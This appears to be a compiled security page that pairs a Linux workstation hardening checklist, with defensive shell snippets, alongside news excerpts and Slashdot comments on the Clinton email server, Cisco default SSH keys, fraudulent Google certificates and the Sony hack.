Avoid FireWire, Thunderbolt, and ExpressCard ports
FireWire is a standard that, by design, gives any connecting device full direct memory access (DMA) to your system (see Wikipedia). Thunderbolt and ExpressCard are guilty of the same, though some later implementations of Thunderbolt attempt to limit the scope of memory access. It is best if the system you are getting has none of these ports, but this is not critical, as they can usually be turned off in UEFI or disabled in the kernel itself.
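If your hardware does have these ports, one common mitigation on Linux is to blacklist the relevant kernel modules so they cannot be loaded. A minimal sketch (module names are those used by the mainline kernel; the file path assumes a modprobe.d-style distribution):

    # Prevent the FireWire and Thunderbolt drivers from ever loading:
    cat <<EOF | sudo tee /etc/modprobe.d/blacklist-dma.conf
    blacklist firewire-core
    blacklist thunderbolt
    EOF
    sudo update-initramfs -u    # Debian/Ubuntu; on Fedora: sudo dracut -f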
TPM Chip
Trusted Platform Module (TPM) is a crypto chip bundled with the motherboard separately from the core processor, which can be used for additional platform security (such as storing full-disk encryption keys), but is not normally used for day-to-day workstation operation. At best, this is a nice-to-have, unless you have a specific need to use TPM for your workstation security.
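To find out whether a machine has a TPM at all, a quick sketch on Linux:

    ls /sys/class/tpm/      # a tpm0 entry means the kernel detected a TPM
    dmesg | grep -i tpm     # driver messages from boot, if any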
Checklist
- Has a robust MAC/RBAC implementation (SELinux/AppArmor/GrSecurity) (ESSENTIAL)
- Publishes security bulletins (ESSENTIAL)
- Provides timely security patches (ESSENTIAL)
- Provides cryptographic verification of packages (ESSENTIAL)
- Fully supports UEFI and SecureBoot (ESSENTIAL)
- Has robust native full disk encryption support (ESSENTIAL)
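Several of these items can be spot-checked from a shell on the running system. A quick sketch, assuming a Fedora-style distribution with the mokutil utility installed:

    getenforce                         # SELinux mode; should print "Enforcing"
    mokutil --sb-state                 # prints "SecureBoot enabled" when active
    lsblk -o NAME,TYPE | grep crypt    # LUKS-encrypted volumes show TYPE "crypt"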
[Oct 13, 2015] Hillary Clinton's private server was open to low-skilled hackers
Notable quotes:
"... " That's total amateur hour. Real enterprise-class security, with teams dedicated to these things, would not do this" -- ..."
"... The government and security firms have published warnings about allowing this kind of remote access to Clinton's server. The same software was targeted by an infectious Internet worm, known as Morta, which exploited weak passwords to break into servers. The software also was known to be vulnerable to brute-force attacks that tried password combinations until hackers broke in, and in some cases it could be tricked into revealing sensitive details about a server to help hackers formulate attacks. ..."
"... Also in 2012, the State Department had outlawed use of remote-access software for its technology officials to maintain unclassified servers without a waiver. It had banned all instances of remotely connecting to classified servers or servers located overseas. ..."
"... The findings suggest Clinton's server 'violates the most basic network-perimeter security tenets: Don't expose insecure services to the Internet,' said Justin Harvey, the chief security officer for Fidelis Cybersecurity. ..."
"... The U.S. National Institute of Standards and Technology, the federal government's guiding agency on computer technology, warned in 2008 that exposed server ports were security risks. It said remote-control programs should only be used in conjunction with encryption tunnels, such as secure VPN connections. ..."
Daily Mail Online
Investigation by the Associated Press reveals that the clintonemail.com server lacked basic protections
- Microsoft remote desktop service she used was not intended for use without additional safety features - but had none
- Government and computer industry had warned at the time that such set-ups could be hacked - but nothing was done to make server safer
- President this weekend denied national security had been put at risk by his secretary of state but FBI probe is still under way
... ... ...
Clinton's server, which handled her personal and State Department correspondence, appeared to allow users to connect openly over the Internet to control it remotely, according to detailed records compiled in 2012.
Experts said the Microsoft remote desktop service wasn't intended for such use without additional protective measures, and was the subject of U.S. government and industry warnings at the time over attacks from even low-skilled intruders.
.... ... ...
Records show that Clinton additionally operated two more devices on her home network in Chappaqua, New York, that also were directly accessible from the Internet.
" That's total amateur hour. Real enterprise-class security, with teams dedicated to these things, would not do this" -- Marc Maiffret, cyber security expert
- One contained similar remote-control software that also has suffered from security vulnerabilities, known as Virtual Network Computing, and the other appeared to be configured to run websites.
- The new details provide the first clues about how Clinton's computer, running Microsoft's server software, was set up and protected when she used it exclusively over four years as secretary of state for all work messages.
- Clinton's privately paid technology adviser, Bryan Pagliano, has declined to answer questions about his work from congressional investigators, citing the U.S. Constitution's Fifth Amendment protection against self-incrimination.
- Some emails on Clinton's server were later deemed top secret, and scores of others included confidential or sensitive information.
- Clinton has said that her server featured 'numerous safeguards,' but she has yet to explain how well her system was secured and whether, or how frequently, security updates were applied.
'That's total amateur hour,' said Marc Maiffret, who has founded two cyber security companies. He said permitting remote-access connections directly over the Internet would be the result of someone choosing convenience over security or failing to understand the risks. 'Real enterprise-class security, with teams dedicated to these things, would not do this,' he said.
The government and security firms have published warnings about allowing this kind of remote access to Clinton's server. The same software was targeted by an infectious Internet worm, known as Morto, which exploited weak passwords to break into servers. The software also was known to be vulnerable to brute-force attacks that tried password combinations until hackers broke in, and in some cases it could be tricked into revealing sensitive details about a server to help hackers formulate attacks.
'An attacker with a low skill level would be able to exploit this vulnerability,' said the Homeland Security Department's U.S. Computer Emergency Readiness Team in 2012, the same year Clinton's server was scanned.
Also in 2012, the State Department had outlawed use of remote-access software for its technology officials to maintain unclassified servers without a waiver. It had banned all instances of remotely connecting to classified servers or servers located overseas.
The findings suggest Clinton's server 'violates the most basic network-perimeter security tenets: Don't expose insecure services to the Internet,' said Justin Harvey, the chief security officer for Fidelis Cybersecurity.
Clinton's email server at one point also was operating software necessary to publish websites, although it was not believed to have been used for this purpose.
Traditional security practice dictates shutting off all of a server's unnecessary functions to prevent hackers from exploiting design flaws in them.
In Clinton's case, Internet addresses the AP traced to her home in Chappaqua revealed open ports on three devices, including her email system.
Each numbered port is commonly, but not always uniquely, associated with specific features or functions. The AP in March was first to discover Clinton's use of a private email server and trace it to her home.
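For illustration, this is roughly how such exposed remote-access services show up in a port scan (the hostname is a placeholder; never scan systems you do not own):

    nmap -Pn -p 80,443,3389,5900 server.example.com
    # 3389/tcp open  ms-wbt-server   <- Microsoft Remote Desktop (RDP)
    # 5900/tcp open  vnc             <- Virtual Network Computing (VNC)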
Mikko Hypponen, the chief research officer at F-Secure, a top global computer security firm, said it was unclear how Clinton's server was configured, but an out-of-the-box installation of remote desktop would have been vulnerable.
Those risks - such as giving hackers a chance to run malicious software on her machine - were 'clearly serious' and could have allowed snoops to deploy so-called 'back doors.'
The U.S. National Institute of Standards and Technology, the federal government's guiding agency on computer technology, warned in 2008 that exposed server ports were security risks.
It said remote-control programs should only be used in conjunction with encryption tunnels, such as secure VPN connections.
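As a sketch of the tunnel pattern NIST describes, here using an SSH local forward in place of a full VPN (hostnames are placeholders):

    # RDP traffic reaches the internal server only through the encrypted
    # tunnel; port 3389 itself is never exposed to the Internet.
    ssh -L 3389:internal-server:3389 admin@gateway.example.com
    # ...then point the RDP client at localhost:3389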
Personal workstation backups
Workstation backups tend to be overlooked or done in a haphazard, often unsafe manner.
Checklist
- Set up encrypted workstation backups to external storage (ESSENTIAL)
- Use zero-knowledge backup tools for off-site/cloud backups (NICE)
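One possible way to satisfy both items is duplicity, which produces GPG-encrypted archives and can target local disks as well as remote or cloud storage. A minimal sketch (the key ID and paths are placeholders):

    # Encrypted backup of the home directory to external storage:
    duplicity --encrypt-key 0xDEADBEEF ~/ file:///media/backup/home
    # Periodically verify that a restore actually works:
    duplicity restore file:///media/backup/home /tmp/restore-test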
Firefox for work and high security sites
Use Firefox to access work-related sites, where extra care should be taken to ensure that data like cookies, sessions, login information, and keystrokes does not fall into attackers' hands. You should NOT use this browser to access any sites except a select few.
You should install the following Firefox add-ons:
- NoScript (ESSENTIAL)
- NoScript prevents active content from loading, except from user-whitelisted domains. It is a great hassle to use with your default browser (though it offers really good security benefits), so we recommend only enabling it on the browser you use to access work-related sites.
- Privacy Badger (ESSENTIAL)
- EFF's Privacy Badger will prevent most external trackers and ad platforms from being loaded, which will help avoid compromises on these tracking sites from affecting your browser (trackers and ad sites are very commonly targeted by attackers, as they allow rapid infection of thousands of systems worldwide).
- HTTPS Everywhere (ESSENTIAL)
- This EFF-developed Add-on will ensure that most of your sites are accessed over a secure connection, even if a link you click is using http:// (great to avoid a number of attacks, such as SSL-strip).
- Certificate Patrol (NICE)
- This tool will alert you if the site you're accessing has recently changed their TLS certificates -- especially if it wasn't nearing expiration dates or if it is now using a different certification authority. It helps alert you if someone is trying to man-in-the-middle your connection, but generates a lot of benign false-positives.
You should leave Firefox as your default browser for opening links, as NoScript will prevent most active content from loading or executing.
Chrome/Chromium for everything else
Chromium developers are ahead of Firefox in adding a lot of nice security features (at least on Linux), such as seccomp sandboxes, kernel user namespaces, etc, which act as an added layer of isolation between the sites you visit and the rest of your system. Chromium is the upstream open-source project, and Chrome is Google's proprietary binary build based on it (insert the usual paranoid caution about not using it for anything you don't want Google to know about).
It is recommended that you install Privacy Badger and HTTPS Everywhere extensions in Chrome as well and give it a distinct theme from Firefox to indicate that this is your "untrusted sites" browser.
2: Use two different browsers, one inside a dedicated VM (NICE)
This is a similar recommendation to the above, except you will add an extra step of running the "everything else" browser inside a dedicated VM that you access via a fast protocol, allowing you to share clipboards and forward sound events (e.g. Spice or RDP). This will add an excellent layer of isolation between the untrusted browser and the rest of your work environment, ensuring that attackers who manage to fully compromise your browser will then have to additionally break out of the VM isolation layer in order to get to the rest of your system.
This is a surprisingly workable configuration, but it requires a lot of RAM and fast processors that can handle the increased load. It will also require a significant amount of dedication from the admin, who will need to adjust their work practices accordingly.
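As a sketch, with a libvirt/KVM setup the untrusted-browser VM can be attached to over Spice with a single command (the VM name is a placeholder):

    virt-viewer --connect qemu:///system untrusted-browser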
3: Fully separate your work and play environments via virtualization (PARANOID)
See Qubes-OS project, which strives to provide a high-security workstation environment via compartmentalizing your applications into separate fully isolated VMs.
Password managers
Checklist
- Use a password manager (ESSENTIAL)
- Use unique passwords on unrelated sites (ESSENTIAL)
- Use a password manager that supports team sharing (NICE)
- Use a separate password manager for non-website accounts (NICE)
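One tool that covers most of these items on Linux is pass, which stores each entry as a GPG-encrypted file under ~/.password-store. A short sketch, assuming a GPG key already exists (the entry names are examples):

    pass init you@example.com       # initialize the store with your GPG key
    pass generate work/gitlab 24    # create a unique 24-character password
    pass work/gitlab                # decrypt and print it when needed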
Securing SSH and PGP private keys
Personal encryption keys, including SSH and PGP private keys, are going to be the most prized items on your workstation -- something the attackers will be most interested in obtaining, as that would allow them to further attack your infrastructure or impersonate you to other admins. You should take extra steps to ensure that your private keys are well protected against theft.
Checklist
- Strong passphrases are used to protect private keys (ESSENTIAL)
- PGP Master key is stored on removable storage (NICE)
- Auth, Sign and Encrypt Subkeys are stored on a smartcard device (NICE)
- SSH is configured to use PGP Auth key as ssh private key (NICE)
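The last two items fit together: with GnuPG 2.1 or later, gpg-agent can serve your PGP Auth subkey over the SSH agent protocol. A sketch of the setup:

    echo "enable-ssh-support" >> ~/.gnupg/gpg-agent.conf
    export SSH_AUTH_SOCK=$(gpgconf --list-dirs agent-ssh-socket)
    ssh-add -L    # should now list a key derived from your Auth subkey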
Hibernate or shut down, do not suspend
When a system is suspended, the RAM contents are kept on the memory chips and can be read by an attacker (known as the Cold Boot Attack). If you are going away from your system for an extended period of time, such as at the end of the day, it is best to shut it down or hibernate it instead of suspending it or leaving it on.
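On a systemd-based distribution, hibernating is a single command (this assumes swap space large enough to hold the RAM image; note that the image lands in swap, so swap itself should be encrypted):

    systemctl hibernate    # suspend-to-disk; RAM is powered off once the image is written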
The world of IT security is a rabbit hole with no bottom. If you would like to go deeper, or find out more about security features on your particular distribution, please check out the following links:
- Fedora Security Guide
- CESG Ubuntu Security Guide
- Debian Security Manual
- Arch Linux Security Wiki
- Mac OSX Security
[Dec 07, 2015] 10 Highlights of Jon Corbet's Linux Kernel Report
"... The kernel has roughly 19 million lines of code, and over 3 million lines haven't been touched in 10 years. The problem with old, unmaintained code is that it tends to harbor some really old bugs. "We have millions of systems out there running Linux and milions of people relying on security of a system on which the Linux kernel is the base," Corbet said. "If we're not going to let those people down, we need to be more serious about security."
..."In his keynote talk at Collaboration Summit, kernel contributor and LWN Editor Jon Corbet elaborated on the results of the Who Writes Linux report, released today, and gave more insights on where kernel development is headed over the next year, its challenges, and successes. Here are 10 highlights (watch the full video, below):
1. 3.15 was the biggest kernel release ever with 13,722 patches merged. "I imagine we will surpass that again," Corbet said. "The amount of changes to the kernel is just going up over time."
2. The number of developers participating is going up while the time it takes to create a kernel release is dropping. It started at 80 days between kernel releases some time ago, and it's now down to about 63 days. "I don't know how much shorter we can get," he said.
3. Developers added seven new system calls to the kernel over the past year, along with new features such as deadline scheduling, control group reworking, multiqueue block layer, and lots of networking improvements. That's in addition to hundreds of new hardware drivers and thousands of bug fixes.
4. Testing is a real challenge for the kernel. Developers are doing better at finding bugs before they affect users or open a security hole. Improved integration testing during the merge window, using the zero day build bot to find problems before they get into the mainline kernel, and new free and proprietary testing tools have improved kernel testing. But there is still room for improvement.
5. Corbet's own analysis found 115 kernel CVEs in 2014, or a vulnerability every three days.
6. The kernel has roughly 19 million lines of code, and over 3 million lines haven't been touched in 10 years. The problem with old, unmaintained code is that it tends to harbor some really old bugs. "We have millions of systems out there running Linux and millions of people relying on the security of a system on which the Linux kernel is the base," Corbet said. "If we're not going to let those people down, we need to be more serious about security."
7. The year 2038 problem - the year the time_t value runs out of bits in the kernel's existing time format - needs to be fixed sooner rather than later (see the one-liner after this list). The core timekeeping code of the kernel was fixed in 2014 – the other layers of the kernel will take more work.
8. The Linux kernel is getting bigger with each version and currently uses 1 MB of memory. That's too big to support devices built for the Internet of Things. The kernel tinification effort is re-thinking the traditional Linux kernel, for example getting rid of the concept of users and groups in the kernel, but it faces some resistance. "We can't just count on the dominance of Linux in this area unless we earn it" by addressing the needs of much smaller systems, Corbet said.
9. Live kernel patching is coming to the mainline kernel this year.
10. The kdbus subsystem development - an addition coming in 2015 that will help make distributed computing more secure - has been a model of how kernel development should work.
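For item 7, the 2038 boundary is easy to see for yourself with GNU date:

    date -u -d @2147483647
    # Tue Jan 19 03:14:07 UTC 2038 -- the last second a signed 32-bit time_t can hold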
[Oct 14, 2015] Security farce at Datto Inc that held Hillary Clinton's emails revealed
[Jun 27, 2015] Cisco Security Appliances Found To Have Default SSH Keys
Jun 27, 2015 | Slashdot
June 26, 2015 | Soulskill: Trailrunner7 writes: Many Cisco security appliances contain default, authorized SSH keys that can allow an attacker to connect to an appliance and take almost any action he chooses. The company said all of its Web Security Virtual Appliances, Email Security Virtual Appliances, and Content Security Management Virtual Appliances are affected by the vulnerability. This bug is about as serious as they come for enterprises. An attacker who is able to discover the default SSH key would have virtually free rein on vulnerable boxes, which, given Cisco's market share and presence in the enterprise worldwide, is likely a high number. The default key apparently was inserted into the software for support reasons.
"The vulnerability is due to the presence of a default authorized SSH key that is shared across all the installations of WSAv, ESAv, and SMAv. An attacker could exploit this vulnerability by obtaining the SSH private key and using it to connect to any WSAv, ESAv, or SMAv. An exploit could allow the attacker to access the system with the privileges of the root user," Cisco said.
[Jun 02, 2015] Sony Hack: Clooney Says Movie Is About Snowden, Not Journalism
Dec 22, 2014 | The Intercept
A draft of the release was sent to a senior executive in Sony’s Government Affairs office, Keith Weaver, who offered a few “concerns/edits” before they were sent to Greenwald. Weaver was concerned about how Sony described U.S. government spying. Weaver wrote:
1. In the first sentence of the second paragraph – delete the phrase “illegal spying” and either it [sic] simply as “operations” or replace it with “intelligence gathering” — so the clause would read “U.S. government’s intelligence gathering operations.”
2. In the second sentence of the second paragraph — delete the “phrase misuse of power” and replace it with “actions” or “activities” so that it would read “The NSA’s actions” or “the NSA’S activities.”
Weaver was also concerned about how the draft quoted Greenwald as saying, “Growing up, I was heavily influenced by political films, and am excited about the opportunity to be a part of a political film that will resonate with today’s moviegoers.” Weaver, who would go on to be a key figure in the damage control team on Sony’s The Interview, wondered in the same email whether Sony wanted Greenwald to describe it as a “political film.”
“That’s really more of PR point so up to you guys — and I suspect since it is his own quote Greenwald will feel strongly,” the Sony executive wrote.
The final version of the press release took Weaver’s suggestions on toning down the language on NSA, but let Greenwald’s quote stand (Greenwald, when asked about the emails, says he was “unaware, but am not surprised, that an internal Sony lobbyist diluted the press release draft in order to avoid upsetting the government.”)
[Dec 07, 2015] Google Stares Down Yet Another Fraudulent SSL-TLS Certificate By Sean Michael Kerner
See also Another SSL-TLS fraudulent certificates issued b... Qualys Community
March 25, 2015 | InternetNews
The purpose of an SSL/TLS digital certificate is to provide a degree of authenticity and integrity to an encrypted connection. The SSL/TLS certificate helps users positively identify sites, but what happens when a certificate is wrongly issued? Just ask Google, which has more experience than most in dealing with this issue.
On March 23 Google reported that unauthorized certificates for Google domains were issued by MCS Holdings, which is an intermediate certificate authority under CNNIC. Because CNNIC is a trusted CA that is included in every major Web browser, the certificate might have been trusted by default, even though it wasn't legitimate.
Google, thanks to its own past experience, leverages HTTP public key pinning (HPKP) in Chrome and Firefox. With HPKP, sites can "pin" certificates that they will allow. As such, fraudulent certificates not pinned by Google would not be accepted as authentic.
Browsers that don't support HPKP in the same way, including Apple Safari and Microsoft Internet Explorer, might have been potentially tricked by the fraudulent certificates, however.
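Pinning automates an issuer check that can also be performed by hand with OpenSSL; an unexpected issuer on a well-known site is exactly the red flag HPKP reacts to:

    openssl s_client -connect www.google.com:443 -servername www.google.com </dev/null 2>/dev/null \
      | openssl x509 -noout -issuer -subject -dates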
Google's Response
"We promptly alerted CNNIC and other major browsers about the incident, and we blocked the MCS Holdings certificate in Chrome with a CRLSet push," Google Security Engineer Adam Langley wrote in a blog post. "Chrome users do not need to take any action to be protected by the CRLSet updates."
Google uses CRLSet, a certificate revocation list mechanism, to make certificates untrusted in the Chrome browser. Google has no indication that the fraudulent certificates were actually used in an attack, Langley added.
As to how and why CNNIC let an unauthorized Google certificate be issued, CNNIC said that MCS was using the certificate as a man-in-the-middle proxy.
"These devices intercept secure connections by masquerading as the intended destination and are sometimes used by companies to intercept their employees’ secure traffic for monitoring or legal reasons," Langley explained.
Langley said that since the proxy had a certificate issued by a public CA, the employee connections trusted the proxy.
CNNIC joins a growing list of CAs that have issued fraudulent certificates for Google over the past few years. Comodo in 2011 and Turktrust in 2013 also issued fraudulent Google certificates via intermediaries.
Sean Michael Kerner is a senior editor at eSecurityPlanet and InternetNews.com. Follow him on Twitter @TechJournalist.
[Dec 27, 2014] FBI Warned a Year Ago of Impending Malware Attacks—But Didn't Share Info with Sony
Multiple sources familiar with the report and the FBI's distribution channels said Sony would only have seen it at all if members of its IT department belonged to InfraGard, a voluntary organization that also received the report.
https://firstlook.org/theintercept/2014/12/24/fbi-warning/
Nearly one year before Sony was hacked, the FBI warned that U.S. companies were facing potentially crippling data destruction malware attacks, and predicted that such a hack could cause irreparable harm to a firm’s reputation, or even spell the end of the company entirely. The FBI also detailed specific guidance for U.S. companies to follow to prepare and plan for such an attack.
But the FBI never sent Sony the report.
The Dec. 13, 2013 FBI Intelligence Assessment, “Potential Impacts of a Data-Destruction Malware Attack on a U.S. Critical Infrastructure Company’s Network,” warned that companies “must become prepared for the increasing possibility they could become victim to a data destruction cyber attack.”
The 16-page report includes details on previous malware attacks on South Korean banking and media companies—the same incidents and characteristics the FBI said on Dec. 19th it had used to conclude that North Korea was behind the Sony attack.
The report, a copy of which was obtained by The Intercept, was based on discussions with private industry representatives and was prepared after the 2012 cyber attack on Saudi Aramco. The report was marked For Official Use Only, and has not been previously released.
In it, the FBI warned, “In the current cyber climate, the FBI speculates it is not a question of if a U.S. company will experience an attempted data-destruction attack, but when and which company will fall victim.”
The detailed warning raises new questions about how prepared Sony should have been for the December hack, which resulted in terabytes of commercial and personal data being stolen or released on the internet, including sensitive company emails and employee medical and personal data. Multiple sources told The Intercept that the December 2013 report raises new questions about what Sony—which is considered by the U.S. government as part of “critical infrastructure”—did or did not do to secure its systems in the year before the cyber attack.
Earlier this month, the FBI formally accused North Korea of being behind the Sony hack. “Technical analysis of the data deletion malware used in this attack revealed links to other malware that the FBI knows North Korean actors previously developed,” the Dec. 19th FBI press release said. “For example, there were similarities in specific lines of code, encryption algorithms, data deletion methods, and compromised networks.”
The FBI also recently referred to specific evidence they say led them to determine North Korea’s involvement, including the use of the same infrastructure, IP addresses, and similarities between the Sony attack and last year’s attack against South Korean businesses and media.
North Korea has repeatedly denied involvement in the Sony cyber attack.
The FBI warning from December 2013 focuses on the same type of data destruction malware attack that Sony fell victim to nearly a year later. The report questions whether industry was overly optimistic about recovering from such an attack and notes that some companies “wondered whether [a malware attack] could have a more significant destructive impact: the failure of the company.”
In fact, the 2013 report contains a nearly identical description of the attacks detailed in the recent FBI release. “The malware used deleted just enough data to make the machines unusable; the malware was specifically written for Korean targets, and checked for Korean antivirus products to disable,” the Dec. 2013 report said. “The malware attack on South Korean companies defaced the machine with a message from the ‘WhoIs Team.’”
Sony did not respond to The Intercept’s questions about whether they had received the report, but the FBI confirmed that Sony was not on the distribution list. “The FBI did not provide it directly to them,” FBI spokesman Paul Bresson told The Intercept. “It was provided to several of our outreach components for dissemination as appropriate.”
Multiple sources familiar with the report and the FBI's distribution channels said Sony would only have seen it at all if members of its IT department belonged to InfraGard, a voluntary organization that also received the report.
The report obtained by The Intercept includes pages of checklists and step-by-step guidance for U.S. companies on how to prepare for, mitigate and recover from the same exact type of hack that hit Sony. Those sorts of "best practices" are critical for companies trying to fend off cases like the Sony attack, Kurt Baumgartner, Principal Security Researcher at Kaspersky Lab, told The Intercept.
Sony was “not adequately following best practices for a company of its size and sector,” Baumgartner said. “The most obvious, had they followed netflow monitoring recommendations, they would have noticed the outbound exfiltration of terabytes of data.”
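For illustration, this is the kind of NetFlow query that surfaces bulk exfiltration, assuming an nfdump collector writing flow files under /var/cache/nfcapd:

    # Top 10 destination IPs by bytes transferred; terabytes flowing to an
    # unfamiliar address would stand out immediately.
    nfdump -R /var/cache/nfcapd -s dstip/bytes -n 10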
Had Sony gotten the FBI report, they also would have received specific guidance prepared by the Department of Homeland Security Industrial Control Systems Cyber Emergency Response Team for preparation and planning for a successful destructive malware attack. Sources familiar with the 2013 report believe if Sony had followed these guidelines the effects of the cyber attack would have been far less severe.
The real question, then, is whether more could have been done to prevent the Sony hack, and if so, what. "Korean data was available since then—nobody really paid any attention to it," a source within the information security industry told The Intercept.
“The question is, who dropped the ball?” the source said. “Was the information in this report not shared or was information ignored?”
Photo: Nick Ut/AP
[Dec 26, 2014] Did North Korea Really Attack Sony?
An anonymous reader writes "Many security experts remain skeptical of North Korea's involvement in the recent Sony hacks. Schneier writes: "Clues in the hackers' attack code seem to point in all directions at once. The FBI points to reused code from previous attacks associated with North Korea, as well as similarities in the networks used to launch the attacks. Korean language in the code also suggests a Korean origin, though not necessarily a North Korean one, since North Koreans use a unique dialect. However you read it, this sort of evidence is circumstantial at best. It's easy to fake, and it's even easier to interpret it incorrectly. In general, it's a situation that rapidly devolves into storytelling, where analysts pick bits and pieces of the "evidence" to suit the narrative they already have worked out in their heads.""
BitterOak (537666) on Wednesday December 24, 2014 @06:21PM (#48670061)
I was suspicious from the moment they denied it. (Score:5, Insightful)
I was suspicious of the U.S. allegations that the North Korean government was behind it when the North Koreans denied it was them. If you're going to hack somebody to make a political statement, it makes no sense to later deny that you were involved. Someone might be trying to make it look like North Korea, but I seriously doubt they were directly involved in this.
Rei (128717) on Wednesday December 24, 2014 @06:24PM (#48670077) Homepage
Right. (Score:3)
Because the world is just full of people who would hack a company to blackmail them not to release a movie about Kim Jong Un. Because everyone loves the Great Leader! His family's personality cult^H^H^H^H^H^H^H^H^H^H^H^H^H^H^H^HVoluntary Praise Actions only take up about 1/3rd of the North Korean budget. And I mean, they totally deserve it. I mean, did you know that his father was the world's greatest golf player who never had to defecate and whose birth was foretold by a swallow and heralded by a new star in the sky?
No, of course it wasn't North Korea. Clearly it was the work of America! Because America wants nothing more than a conflict with North Korea right now. Because clearly Russia and Syria and ISIS aren't enough, no, the US obviously has nothing better to do than to try to stir up things out of the blue with the Hollywood obsessed leader of a cult state whose family has gone so far as to kidnap filmmakers and force them to make movies for him. It all just makes so damn much sense!
Cue the conspiracy theorists in three, two, one...
Anonymous Coward on Wednesday December 24, 2014 @06:26PM (#48670085)
Shakey evidence hasn't stopped the US government (Score:2, Insightful)
Removing the government, destabilising the region and killing hundreds of thousands of civilians based solely on circumstantial evidence isn't exactly new to the US government; I'm sure they don't really care who was truly responsible.
arth1 (260657) on Wednesday December 24, 2014 @07:45PM (#48670469) Homepage Journal
Re: Shakey evidence hasn't stopped the US governme (Score:4, Interesting)
There is, however, possibly the world's largest repository of rare earth metals [wikipedia.org].
dltaylor (7510) on Wednesday December 24, 2014 @06:29PM (#48670097)
not really likely (Score:5, Interesting)
NK denied it, rather than taking credit.
Their tools are widely distributed, so faking the source is really easy.
The US government is a weird combination of ineptitude and self-aggrandizement, so the FBI claims are likely pure BS designed to make the claimants look good (they were SOOO sure they had profiled the Yosemite killer years ago that it only took two more deaths to prove them wrong).
Greyfox (87712) on Wednesday December 24, 2014 @06:29PM (#48670099) Homepage Journal
To What End? (Score:2)
So what's the motive then? Plain ol' extortion, or are they trying to distract the media from the CIA torture story that came out about the same time? If it's the latter, it did a good job -- the media and public seem to have the attention span of a two-year-old.
MichaelSmith (789609) on Wednesday December 24, 2014 @06:38PM (#48670151) Homepage Journal
Re:To What End? (Score:5, Informative)
The same article over at boing boing suggested that a sacked ex employee had released the files.
Okian Warrior (537106) on Wednesday December 24, 2014 @06:39PM (#48670153) Homepage Journal
Wait - what? (Score:5, Insightful)
The FBI points to reused code from previous attacks associated with North Korea [...]
Um... I hate to be the non-technical person that points this out, but...
The evidence that implicates NK on the previous attacks - is it the same evidence used to assign blame in the current attack?
Is this citing the conclusions based on the same evidence/situation from previous attacks to give legitimacy to the evidence in the current attack?
What a scam! Claim something on flimsy evidence, then cite those claims to give legitimacy to the flimsy evidence! I wonder... can I do this sort of thing in the scientific literature? Hmmmm...
jd.schmidt (919212) on Wednesday December 24, 2014 @07:29PM (#48670401)
If NK did it, explain this one.. (Score:5, Informative)
So I hear it was an inside job; how did NK get a spy infiltrated into Sony so quickly? Does NK really have that many spy assets all over the U.S. that they can whistle up as needed? Or was this an elaborate operation set up when the movie was first announced, and they managed to infiltrate a NK citizen into Sony Pictures in the time it took to make the movie? How does this all actually go down? FYI, NK is pretty computer illiterate overall compared to most countries, and nearly every country on the planet is better positioned than NK to pull this stunt off, along with a whole bunch of independent yahoos.
Unless there is a U.S.-born traitor working for NK, it seems that the possible suspects could be narrowed down pretty quickly. I am NOT saying NK was framed, but I AM saying there are a lot of people out there who do stuff for reasons I wouldn't, and more real data is needed.
kencurry (471519) on Wednesday December 24, 2014 @07:46PM (#48670481)
So much wrong here (Score:5, Insightful)
1) No concrete evidence that a sovereign country hacked into Sony, but POTUS says he thinks they did anyways
2) Movie is probably total piece of sh*t anyways, who cares?
3) Even if NK did it, it is not an attack on the US but on a foreign corp with some US holdings - still a Japanese company, so why don't they saber rattle instead of us?
4) The whole thing could have been PR stunt from Sony to advertise the movie
5) Why didn't POTUS just tell Sony "get your sh*t together, improve your security - tired of this crap, dayum!"
Eternal Vigilance (573501) on Wednesday December 24, 2014 @08:00PM (#48670543)
The NK story was cover to protect Sony (and NSA) (Score:5, Insightful)
Of course North Korea didn't attack Sony. Asking "Did North Korea really attack Sony?" is like asking "Does NORAD really track Santa?"
The North Korea story was spin to save Sony from the devastating bad publicity about the depths of their business and technological incompetence. (The politicians who defended them will get repaid for this favor during the next election cycle. My previous comment about this from last week: They may even start using this to try to rescue that disaster of a movie. "You have to see 'The Interview'! To support free speech and America!" [slashdot.org])
The Dear Leader Of The Free World announcing "don't blame poor Sony, they were helpless victims of the evil North Koreans" totally changed the media story, saving Sony huge $$$ in both public perception and future lawsuits.
But just how America's President and trillion-dollar national security state could get things so wrong - but should always be trusted when saying who's bad and deserves to be killed, like some kind of psycho-Santa delivering death from his sleigh filled with drones - will never be questioned.
Businesses and politicians will never stop lying when it works this well.
Merry Christmas.
fremsley471 (792813) on Wednesday December 24, 2014 @06:56PM (#48670245)
Re:Occam's Razor (Score:5, Insightful)
No, Occam's Razor said the simplest answer is most likely true. The OP didn't go on a flight of fantasy, you did. Nation state hacks corporation with possible major diplomatic consequences over a B-movie? Pull the other one, it's got WMDs on it.
arth1 (260657) on Wednesday December 24, 2014 @07:03PM (#48670287) Homepage Journal
Re:Occam's Razor (Score:5, Insightful)
I do not think you know what Occam's razor is. It does not mean you need conclusive evidence to believe in something. It means the simplest explanation tends to be the best one, other things being equal.
Actually, that's not what it says. It says that plurality is not to be posited without necessity, i.e. don't add complexity to reach a conclusion if it can be reached without adding it.
The simplest solution here isn't that it's North Korea acting based on an unreleased movie they probably hadn't even heard of before this whole debacle, displaying hacking skills not seen before, and then denying it.
Much simpler solutions could be disgruntled former employees or someone doing it for the lulz. It's not like Sony hasn't been a magnet for the latter, with all the previous hacks.
In any case, unless the three letter agencies are withholding crucial information, there's not enough to go on here to point the fingers at Kim Jong-Un. I'm sure there are people who would blame him no matter what, because frankly he's an asshole of Goatse dimensions, but the evidence needs to be far more solid than this.
rwa2 (4391) * on Wednesday December 24, 2014 @08:22PM (#48670617) Homepage Journal
Re:Occam's Razor - PR stunt (Score:3)
Yeah, I'm with you here. I'm sure it's more likely that this is a PR stunt gone wild and we all fell for it. Even the POTUS fell for it. Before this, I hadn't even heard of the studio, much less the movie.
Let's see...
- Sony was already in panic mode after their security breach. This sure took the new spotlight off of that.
- OK, movie is coming out now... oh, no, no it isn't, it's too dangerous! ("ooh, forbidden fruit! No one wants to SEE a BANNED movie, do you?")
- media goes nuts. POTUS makes a statement. NK kicked off the internets.
- OK, sure, you can watch the movie, but ONLY in SELECT THEATERS NEAR YOU!
- Sounds like NK pretty much held to their party line of "huh? We didn't do it! But whatever it was, I bet you deserved it, you capitalist swine!"
suckers :P
abirdman (557790) * <abirdman&maine,rr,com> on Wednesday December 24, 2014 @09:18PM (#48670795) Homepage Journal
Re:Occam's Razor - PR stunt (Score:2)
